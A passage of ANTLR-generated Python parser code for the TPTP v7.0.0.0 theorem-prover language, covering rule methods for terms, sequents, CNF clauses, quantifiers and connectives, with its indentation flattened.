def fof_defined_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_termContext,0)
def fof_system_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_system_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_function_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_function_term" ):
listener.enterFof_function_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_function_term" ):
listener.exitFof_function_term(self)
def fof_function_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_function_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 228, self.RULE_fof_function_term)
try:
self.state = 1208
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1205
self.fof_plain_term()
pass
elif token in [tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 2)
self.state = 1206
self.fof_defined_term()
pass
elif token in [tptp_v7_0_0_0Parser.Dollar_dollar_word]:
self.enterOuterAlt(localctx, 3)
self.state = 1207
self.fof_system_term()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_conditional_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_logic_formulaContext,0)
def fof_term(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_termContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_conditional_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_conditional_term" ):
listener.enterTff_conditional_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_conditional_term" ):
listener.exitTff_conditional_term(self)
def tff_conditional_term(self):
localctx = tptp_v7_0_0_0Parser.Tff_conditional_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 230, self.RULE_tff_conditional_term)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1210
self.match(tptp_v7_0_0_0Parser.T__23)
self.state = 1211
self.tff_logic_formula()
self.state = 1212
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1213
self.fof_term()
self.state = 1214
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1215
self.fof_term()
self.state = 1216
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_let_formula_defns(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_defnsContext,0)
def fof_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,0)
def tff_let_term_defns(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_defnsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_term" ):
listener.enterTff_let_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_term" ):
listener.exitTff_let_term(self)
def tff_let_term(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 232, self.RULE_tff_let_term)
try:
self.state = 1230
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__24]:
self.enterOuterAlt(localctx, 1)
self.state = 1218
self.match(tptp_v7_0_0_0Parser.T__24)
self.state = 1219
self.tff_let_formula_defns()
self.state = 1220
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1221
self.fof_term()
self.state = 1222
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.T__25]:
self.enterOuterAlt(localctx, 2)
self.state = 1224
self.match(tptp_v7_0_0_0Parser.T__25)
self.state = 1225
self.tff_let_term_defns()
self.state = 1226
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1227
self.fof_term()
self.state = 1228
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_tuple_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_arguments(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_argumentsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_tuple_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_tuple_term" ):
listener.enterTff_tuple_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_tuple_term" ):
listener.exitTff_tuple_term(self)
def tff_tuple_term(self):
localctx = tptp_v7_0_0_0Parser.Tff_tuple_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 234, self.RULE_tff_tuple_term)
try:
self.state = 1237
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__17]:
self.enterOuterAlt(localctx, 1)
self.state = 1232
self.match(tptp_v7_0_0_0Parser.T__17)
pass
elif token in [tptp_v7_0_0_0Parser.T__18]:
self.enterOuterAlt(localctx, 2)
self.state = 1233
self.match(tptp_v7_0_0_0Parser.T__18)
self.state = 1234
self.fof_arguments()
self.state = 1235
self.match(tptp_v7_0_0_0Parser.T__19)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_sequentContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_formula_tuple(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_formula_tupleContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_formula_tupleContext,i)
def Gentzen_arrow(self):
return self.getToken(tptp_v7_0_0_0Parser.Gentzen_arrow, 0)
def fof_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_sequent
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_sequent" ):
listener.enterFof_sequent(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_sequent" ):
listener.exitFof_sequent(self)
def fof_sequent(self):
localctx = tptp_v7_0_0_0Parser.Fof_sequentContext(self, self._ctx, self.state)
self.enterRule(localctx, 236, self.RULE_fof_sequent)
try:
self.state = 1247
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__11, tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 1239
self.fof_formula_tuple()
self.state = 1240
self.match(tptp_v7_0_0_0Parser.Gentzen_arrow)
self.state = 1241
self.fof_formula_tuple()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 1243
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1244
self.fof_sequent()
self.state = 1245
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_formula_tupleContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_formula_tuple_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_formula_tuple_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_formula_tuple
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_formula_tuple" ):
listener.enterFof_formula_tuple(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_formula_tuple" ):
listener.exitFof_formula_tuple(self)
def fof_formula_tuple(self):
localctx = tptp_v7_0_0_0Parser.Fof_formula_tupleContext(self, self._ctx, self.state)
self.enterRule(localctx, 238, self.RULE_fof_formula_tuple)
try:
self.state = 1254
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 1249
self.match(tptp_v7_0_0_0Parser.T__16)
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 1250
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1251
self.fof_formula_tuple_list()
self.state = 1252
self.match(tptp_v7_0_0_0Parser.T__12)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_formula_tuple_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_logic_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_logic_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_logic_formulaContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_formula_tuple_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_formula_tuple_list" ):
listener.enterFof_formula_tuple_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_formula_tuple_list" ):
listener.exitFof_formula_tuple_list(self)
def fof_formula_tuple_list(self):
localctx = tptp_v7_0_0_0Parser.Fof_formula_tuple_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 240, self.RULE_fof_formula_tuple_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1256
self.fof_logic_formula()
self.state = 1261
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1257
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1258
self.fof_logic_formula()
self.state = 1263
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Cnf_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def cnf_disjunction(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_disjunctionContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_cnf_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCnf_formula" ):
listener.enterCnf_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCnf_formula" ):
listener.exitCnf_formula(self)
def cnf_formula(self):
localctx = tptp_v7_0_0_0Parser.Cnf_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 242, self.RULE_cnf_formula)
try:
self.state = 1269
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__17, tptp_v7_0_0_0Parser.T__18, tptp_v7_0_0_0Parser.T__23, tptp_v7_0_0_0Parser.T__24, tptp_v7_0_0_0Parser.T__25, tptp_v7_0_0_0Parser.Not, tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 1)
self.state = 1264
self.cnf_disjunction(0)
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 1265
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1266
self.cnf_disjunction(0)
self.state = 1267
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Cnf_disjunctionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def cnf_literal(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_literalContext,0)
def cnf_disjunction(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_disjunctionContext,0)
def Or(self):
return self.getToken(tptp_v7_0_0_0Parser.Or, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_cnf_disjunction
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCnf_disjunction" ):
listener.enterCnf_disjunction(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCnf_disjunction" ):
listener.exitCnf_disjunction(self)
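    # cnf_disjunction is left-recursive (disjunction ::= literal | disjunction '|' literal);
    # ANTLR rewrites it into the iterative precedence-climbing loop below using
    # enterRecursionRule/precpred instead of direct recursion.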
def cnf_disjunction(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Cnf_disjunctionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 244
self.enterRecursionRule(localctx, 244, self.RULE_cnf_disjunction, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1272
self.cnf_literal()
self._ctx.stop = self._input.LT(-1)
self.state = 1279
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,89,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Cnf_disjunctionContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_cnf_disjunction)
self.state = 1274
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 1275
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 1276
self.cnf_literal()
self.state = 1281
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,89,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Cnf_literalContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_atomic_formulaContext,0)
def Not(self):
return self.getToken(tptp_v7_0_0_0Parser.Not, 0)
def fof_infix_unary(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_infix_unaryContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_cnf_literal
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCnf_literal" ):
listener.enterCnf_literal(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCnf_literal" ):
listener.exitCnf_literal(self)
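    # cnf_literal uses adaptive prediction (adaptivePredict) because an atomic
    # formula and an infix (in)equality can begin with the same tokens, so a
    # single-token switch cannot pick the alternative.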
def cnf_literal(self):
localctx = tptp_v7_0_0_0Parser.Cnf_literalContext(self, self._ctx, self.state)
self.enterRule(localctx, 246, self.RULE_cnf_literal)
try:
self.state = 1286
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,90,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1282
self.fof_atomic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1283
self.match(tptp_v7_0_0_0Parser.Not)
self.state = 1284
self.fof_atomic_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 1285
self.fof_infix_unary()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_quantifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_quantifier(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_quantifierContext,0)
def th0_quantifier(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Th0_quantifierContext,0)
def th1_quantifier(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Th1_quantifierContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_quantifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_quantifier" ):
listener.enterThf_quantifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_quantifier" ):
listener.exitThf_quantifier(self)
def thf_quantifier(self):
localctx = tptp_v7_0_0_0Parser.Thf_quantifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 248, self.RULE_thf_quantifier)
try:
self.state = 1291
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Forall, tptp_v7_0_0_0Parser.Exists]:
self.enterOuterAlt(localctx, 1)
self.state = 1288
self.fof_quantifier()
pass
elif token in [tptp_v7_0_0_0Parser.Lambda, tptp_v7_0_0_0Parser.Choice, tptp_v7_0_0_0Parser.Description]:
self.enterOuterAlt(localctx, 2)
self.state = 1289
self.th0_quantifier()
pass
elif token in [tptp_v7_0_0_0Parser.TyForall, tptp_v7_0_0_0Parser.TyExists]:
self.enterOuterAlt(localctx, 3)
self.state = 1290
self.th1_quantifier()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Th0_quantifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Lambda(self):
return self.getToken(tptp_v7_0_0_0Parser.Lambda, 0)
def Choice(self):
return self.getToken(tptp_v7_0_0_0Parser.Choice, 0)
def Description(self):
return self.getToken(tptp_v7_0_0_0Parser.Description, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_th0_quantifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTh0_quantifier" ):
listener.enterTh0_quantifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTh0_quantifier" ):
listener.exitTh0_quantifier(self)
def th0_quantifier(self):
localctx = tptp_v7_0_0_0Parser.Th0_quantifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 250, self.RULE_th0_quantifier)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1293
_la = self._input.LA(1)
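            # Generated token-set membership test: accept only Lambda, Choice or
            # Description here; anything else triggers inline error recovery.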
if not(((((_la - 61)) & ~0x3f) == 0 and ((1 << (_la - 61)) & ((1 << (tptp_v7_0_0_0Parser.Lambda - 61)) | (1 << (tptp_v7_0_0_0Parser.Choice - 61)) | (1 << (tptp_v7_0_0_0Parser.Description - 61)))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Th1_quantifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def TyForall(self):
return self.getToken(tptp_v7_0_0_0Parser.TyForall, 0)
def TyExists(self):
return self.getToken(tptp_v7_0_0_0Parser.TyExists, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_th1_quantifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTh1_quantifier" ):
listener.enterTh1_quantifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTh1_quantifier" ):
listener.exitTh1_quantifier(self)
def th1_quantifier(self):
localctx = tptp_v7_0_0_0Parser.Th1_quantifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 252, self.RULE_th1_quantifier)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1295
_la = self._input.LA(1)
if not(_la==tptp_v7_0_0_0Parser.TyForall or _la==tptp_v7_0_0_0Parser.TyExists):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_pair_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Infix_equality(self):
return self.getToken(tptp_v7_0_0_0Parser.Infix_equality, 0)
def Infix_inequality(self):
return self.getToken(tptp_v7_0_0_0Parser.Infix_inequality, 0)
def binary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Binary_connectiveContext,0)
def Assignment(self):
return self.getToken(tptp_v7_0_0_0Parser.Assignment, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_pair_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_pair_connective" ):
listener.enterThf_pair_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_pair_connective" ):
listener.exitThf_pair_connective(self)
def thf_pair_connective(self):
localctx = tptp_v7_0_0_0Parser.Thf_pair_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 254, self.RULE_thf_pair_connective)
try:
self.state = 1301
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Infix_equality]:
self.enterOuterAlt(localctx, 1)
self.state = 1297
self.match(tptp_v7_0_0_0Parser.Infix_equality)
pass
elif token in [tptp_v7_0_0_0Parser.Infix_inequality]:
self.enterOuterAlt(localctx, 2)
self.state = 1298
self.match(tptp_v7_0_0_0Parser.Infix_inequality)
pass
elif token in [tptp_v7_0_0_0Parser.Iff, tptp_v7_0_0_0Parser.Impl, tptp_v7_0_0_0Parser.If, tptp_v7_0_0_0Parser.Niff, tptp_v7_0_0_0Parser.Nor, tptp_v7_0_0_0Parser.Nand]:
self.enterOuterAlt(localctx, 3)
self.state = 1299
self.binary_connective()
pass
elif token in [tptp_v7_0_0_0Parser.Assignment]:
self.enterOuterAlt(localctx, 4)
self.state = 1300
self.match(tptp_v7_0_0_0Parser.Assignment)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_unary_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def unary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Unary_connectiveContext,0)
def th1_unary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Th1_unary_connectiveContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_unary_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_unary_connective" ):
listener.enterThf_unary_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_unary_connective" ):
listener.exitThf_unary_connective(self)
def thf_unary_connective(self):
localctx = tptp_v7_0_0_0Parser.Thf_unary_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 256, self.RULE_thf_unary_connective)
try:
self.state = 1305
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Not]:
self.enterOuterAlt(localctx, 1)
self.state = 1303
self.unary_connective()
pass
elif token in [tptp_v7_0_0_0Parser.ForallComb, tptp_v7_0_0_0Parser.ExistsComb, tptp_v7_0_0_0Parser.ChoiceComb, tptp_v7_0_0_0Parser.DescriptionComb, tptp_v7_0_0_0Parser.EqComb]:
self.enterOuterAlt(localctx, 2)
self.state = 1304
self.th1_unary_connective()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Th1_unary_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ForallComb(self):
return self.getToken(tptp_v7_0_0_0Parser.ForallComb, 0)
def ExistsComb(self):
return self.getToken(tptp_v7_0_0_0Parser.ExistsComb, 0)
def ChoiceComb(self):
return self.getToken(tptp_v7_0_0_0Parser.ChoiceComb, 0)
def DescriptionComb(self):
return self.getToken(tptp_v7_0_0_0Parser.DescriptionComb, 0)
def EqComb(self):
return self.getToken(tptp_v7_0_0_0Parser.EqComb, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_th1_unary_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTh1_unary_connective" ):
listener.enterTh1_unary_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTh1_unary_connective" ):
listener.exitTh1_unary_connective(self)
def th1_unary_connective(self):
localctx = tptp_v7_0_0_0Parser.Th1_unary_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 258, self.RULE_th1_unary_connective)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1307
_la = self._input.LA(1)
if not(((((_la - 53)) & ~0x3f) == 0 and ((1 << (_la - 53)) & ((1 << (tptp_v7_0_0_0Parser.ForallComb - 53)) | (1 << (tptp_v7_0_0_0Parser.ExistsComb - 53)) | (1 << (tptp_v7_0_0_0Parser.ChoiceComb - 53)) | (1 << (tptp_v7_0_0_0Parser.DescriptionComb - 53)) | (1 << (tptp_v7_0_0_0Parser.EqComb - 53)))) != 0)):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_pair_connectiveContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def binary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Binary_connectiveContext,0)
def Assignment(self):
return self.getToken(tptp_v7_0_0_0Parser.Assignment, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_pair_connective
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_pair_connective" ):
listener.enterTff_pair_connective(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_pair_connective" ):
listener.exitTff_pair_connective(self)
def tff_pair_connective(self):
localctx = tptp_v7_0_0_0Parser.Tff_pair_connectiveContext(self, self._ctx, self.state)
self.enterRule(localctx, 260, self.RULE_tff_pair_connective)
try:
self.state = 1311
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Iff, tptp_v7_0_0_0Parser.Impl, tptp_v7_0_0_0Parser.If, tptp_v7_0_0_0Parser.Niff, tptp_v7_0_0_0Parser.Nor, tptp_v7_0_0_0Parser.Nand]:
self.enterOuterAlt(localctx, 1)
self.state = 1309
self.binary_connective()
pass
elif token in [tptp_v7_0_0_0Parser.Assignment]:
self.enterOuterAlt(localctx, 2)
self.state = 1310
self.match(tptp_v7_0_0_0Parser.Assignment)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_quantifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Forall(self):
return self.getToken(tptp_v7_0_0_0Parser.Forall, 0)
def Exists(self):
return self.getToken(tptp_v7_0_0_0Parser.Exists, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_quantifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_quantifier" ):
listener.enterFof_quantifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_quantifier" ):
listener.exitFof_quantifier(self)
def fof_quantifier(self):
